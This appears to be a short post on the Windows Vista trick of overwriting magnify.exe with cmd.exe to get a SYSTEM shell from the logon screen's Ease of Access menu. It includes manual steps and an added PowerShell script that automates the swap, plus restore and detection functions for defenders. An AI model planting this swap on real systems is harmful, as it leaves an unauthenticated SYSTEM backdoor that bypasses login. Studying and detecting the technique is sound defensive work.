You can run a cmd.exe shell on Vista without logging in, with full SYSTEM rights:
- take ownership of the file %WINDIR%\system32\magnify.exe
- change the permissions of %WINDIR%\system32\magnify.exe and grant your user full control
- copy cmd.exe over %WINDIR%\system32\magnify.exe (overwrite it)
- at the logon screen, open “Ease of Access” and select “Make items on the screen larger (Magnifier)”
- press OK
There is now a cmd shell with SYSTEM rights (check with whoami).
You can even start explorer.exe or kill logonui.exe. If you then log on, the open cmd shell is also available in your logged-on session, BUT with your user credentials.
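The same procedure as a script, with a restore step and the check a defender would run for this swap, as an added example that is not part of the original post. It assumes an elevated PowerShell on Vista or later (takeown.exe and icacls.exe ship with Vista); the function names and the magnify.exe.bak backup name are my own.

```powershell
# Added example, not from the original post. Run from an elevated PowerShell;
# takeown.exe and icacls.exe ship with Vista and later.
$Target = Join-Path $env:windir 'System32\magnify.exe'
$Source = Join-Path $env:windir 'System32\cmd.exe'
$Backup = "$Target.bak"   # assumed name for the saved original

function Invoke-MagnifyReplacement {
    # Steps 1-3 of the post as commands instead of the Explorer security tab.
    # System32 binaries are owned by TrustedInstaller, so even an administrator
    # has to take ownership before the ACL can be changed.
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    & takeown.exe /F $Target | Out-Null                   # step 1: take ownership
    & icacls.exe $Target /grant "$($me):F" | Out-Null     # step 2: full control for your user
    Copy-Item $Target $Backup -Force                      # keep the original for Restore-Magnify
    Copy-Item $Source $Target -Force                      # step 3: overwrite with cmd.exe
    # Steps 4-5 happen at the logon screen: Ease of Access -> Magnifier -> OK.
}

function Restore-Magnify {
    # Put the real magnify.exe back and undo the ownership and ACL changes.
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    Copy-Item $Backup $Target -Force
    Remove-Item $Backup
    & icacls.exe $Target /remove:g $me | Out-Null
    & icacls.exe $Target /setowner 'NT SERVICE\TrustedInstaller' | Out-Null
}

function Test-MagnifyIntegrity {
    # Defender's side. A copied cmd.exe keeps cmd's own version resource, and
    # steps 1-2 leave an owner and an ACE that a default install does not have.
    $item = Get-Item $Target
    $acl  = Get-Acl $Target
    $findings = @()
    if ($item.VersionInfo.OriginalFilename -notlike 'magnify*') {
        $findings += "version resource says '$($item.VersionInfo.OriginalFilename)', not magnify.exe"
    }
    if ($acl.Owner -ne 'NT SERVICE\TrustedInstaller') {
        $findings += "owner is '$($acl.Owner)', expected NT SERVICE\TrustedInstaller"
    }
    $writeData = [System.Security.AccessControl.FileSystemRights]::WriteData
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $ace.IdentityReference.Value -ne 'NT SERVICE\TrustedInstaller' -and
            ([int]$ace.FileSystemRights -band [int]$writeData)) {
            $findings += "$($ace.IdentityReference.Value) can write: $($ace.FileSystemRights)"
        }
    }
    return ,$findings   # empty array = no sign of the swap
}

Test-MagnifyIntegrity   # on an untouched system this returns nothing
```

A signature check alone does not catch this: the swapped-in cmd.exe is itself a Microsoft-signed binary, so it is the version resource (OriginalFilename) and the changed owner and ACL that give the swap away. Run Test-MagnifyIntegrity before and after Invoke-MagnifyReplacement to see all three findings appear, and Restore-Magnify afterwards so the machine is not left with a SYSTEM shell behind the logon screen.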
Hint: this *shouldn’t* be possible with SP1 anymore, we’ll see.